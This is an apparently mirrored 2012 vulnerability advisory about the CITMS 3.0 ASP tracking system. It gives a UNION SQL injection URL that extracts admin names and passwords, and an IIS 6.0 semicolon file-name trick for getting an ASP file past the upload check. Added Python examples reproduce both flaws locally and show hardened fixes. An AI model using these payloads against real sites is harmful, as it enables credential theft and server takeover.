CITMS 3.0 (customer information and tracking management system) SQL injection and file upload vulnerabilities - vulnerability warning - 黑吧安全网 (myhack58)

2012-09-19T00:00:00
ID MYHACK58:62201234962
Type myhack58
Reporter Anonymous
Modified 2012-09-19T00:00:00

Description

Part of the management system's functionality is as follows:

(1) Online adding, modifying and deleting of administrators.

(2) Online adding, modifying and deleting of customer records, with HTML content supported.

(3) Front-end record browsing with a tracking function, plus display of the tracking record and the number of clicks.

Source code download:

http://www.mycodes.net/30/5238.htm

Injection:

list.asp passes the id parameter into its SQL query without filtering. The original SELECT returns 16 columns, so the UNION must supply 16 values; the administrator name and password field from the admin table are returned in positions 2 and 4 of the page output:

http://www.xxx.com/citms3.0/list.asp?id=1320 union select 1,name,3,pass,5,6,7,8,9,10,11,12,13,14,15,16 from admin
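The following is an added example (not code from the advisory or from CITMS 3.0) that reproduces the list.asp bug against a constructed SQLite stand-in and shows the parameterized fix. The table and column names other than admin.name and admin.pass are assumptions; the real application is classic ASP, so only the query-building pattern is being modelled here.

```python
import sqlite3

# Constructed stand-in for the CITMS 3.0 database (the real schema is not
# known). The advisory's UNION supplies 16 values, so the table that list.asp
# reads has 16 columns here; the admin table has the name/pass columns the
# payload extracts.
def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    extra = ", ".join(f"c{i} TEXT" for i in range(2, 17))
    con.execute(f"CREATE TABLE list (id INTEGER, {extra})")
    con.execute("CREATE TABLE admin (name TEXT, pass TEXT)")
    values = ", ".join(f"'v{i}'" for i in range(2, 17))
    con.execute(f"INSERT INTO list VALUES (1320, {values})")
    con.execute("INSERT INTO admin VALUES ('admin', 's3cret')")
    con.commit()
    return con


# The pattern list.asp exhibits: the id parameter is concatenated into SQL.
def vulnerable_list(con: sqlite3.Connection, id_param: str) -> list:
    sql = "SELECT * FROM list WHERE id=" + id_param
    return con.execute(sql).fetchall()


# Hardened version: id must be a plain integer and is bound as a parameter,
# so a UNION (or anything else) in the input never reaches the SQL parser.
def hardened_list(con: sqlite3.Connection, id_param: str) -> list:
    if not id_param.strip().isdigit():
        raise ValueError("id must be a positive integer")
    return con.execute("SELECT * FROM list WHERE id=?", (int(id_param),)).fetchall()


# The advisory's payload, as the value of the id parameter (no URL encoding).
PAYLOAD = "1320 union select 1,name,3,pass,5,6,7,8,9,10,11,12,13,14,15,16 from admin"


def leaked_credentials(con: sqlite3.Connection) -> list:
    """Return the (name, pass) pairs the UNION row places in columns 2 and 4.
    Rows from the admin table are the ones whose first column is the literal 1."""
    rows = vulnerable_list(con, PAYLOAD)
    return [(row[1], row[3]) for row in rows if row[0] == 1]


if __name__ == "__main__":
    db = make_db()
    print("vulnerable query leaks:", leaked_credentials(db))
    try:
        hardened_list(db, PAYLOAD)
    except ValueError as exc:
        print("hardened query rejects payload:", exc)
```

The number of values in the UNION has to equal the column count of the original SELECT or the database rejects the statement, which is why the payload pads positions 5 through 16 with literals.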

Upload:

http://www.xxx.com/soft/demo/citms3.0/upload_pic.asp

The upload check only inspects the final extension. Uploading a file named qing.asp;1.jpg succeeds; the server renames it, but keeps the attacker-controlled qing.asp; prefix and only replaces the trailing part with a random number, giving qing.asp;<random number>.jpg.

For example: http://www.xxx.com/qing.asp;131672.jpg

On IIS 6.0 the part of the file name after the semicolon is ignored when the handler is chosen, so this file is executed as ASP. The trick depends on that IIS 6.0 path-parsing behaviour; later IIS versions serve such a file as a static .jpg.
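The following is an added example (not code from the advisory or from CITMS 3.0) that models the two halves of the upload problem: an extension check of the kind upload_pic.asp appears to make, and the IIS 6.0 semicolon handling that turns the stored name into an ASP file, alongside a hardened naming routine. The allowed-extension list and the behaviour of upload_pic.asp beyond what the advisory states are assumptions.

```python
import os
import secrets

# Assumed image whitelist for an upload_pic-style endpoint.
ALLOWED = {".jpg", ".jpeg", ".gif", ".png"}


def naive_extension_ok(client_name: str) -> bool:
    """Check of the kind upload_pic.asp appears to make: only the final
    extension of the client-supplied name is examined, so 'qing.asp;1.jpg'
    passes because it ends in .jpg."""
    return os.path.splitext(client_name)[1].lower() in ALLOWED


def iis6_handler_extension(stored_name: str) -> str:
    """Model of the IIS 6.0 path-parsing quirk: everything after the first ';'
    in the file name is ignored when the handler is selected, so
    'qing.asp;131672.jpg' is dispatched to the ASP engine."""
    before_semicolon = stored_name.split(";", 1)[0]
    return os.path.splitext(before_semicolon)[1].lower()


def is_executed_as_asp(stored_name: str) -> bool:
    return iis6_handler_extension(stored_name) == ".asp"


def safe_store_name(client_name: str, token: str = "") -> str:
    """Hardened naming: reject names containing ';' or NUL outright, whitelist
    the extension, and throw the client's base name away entirely. The stored
    name is a random hex token plus the whitelisted extension, so no
    attacker-chosen text (such as 'qing.asp;') survives into the path.
    'token' can be supplied for deterministic tests; normally it is random."""
    if ";" in client_name or "\x00" in client_name:
        raise ValueError("illegal character in file name")
    ext = os.path.splitext(client_name)[1].lower()
    if ext not in ALLOWED:
        raise ValueError(f"extension {ext!r} not allowed")
    return (token or secrets.token_hex(8)) + ext


if __name__ == "__main__":
    uploaded = "qing.asp;1.jpg"
    print("naive check accepts", uploaded, "->", naive_extension_ok(uploaded))
    stored = "qing.asp;131672.jpg"   # the renamed file from the advisory
    print(stored, "runs as ASP on IIS 6.0 ->", is_executed_as_asp(stored))
    print("hardened name for photo.JPG ->", safe_store_name("photo.JPG"))
```

Renaming on the server only helps if the client-supplied base name is discarded; a scheme that keeps the prefix and randomizes the suffix, as the advisory describes, still leaves the semicolon and the .asp in front of it.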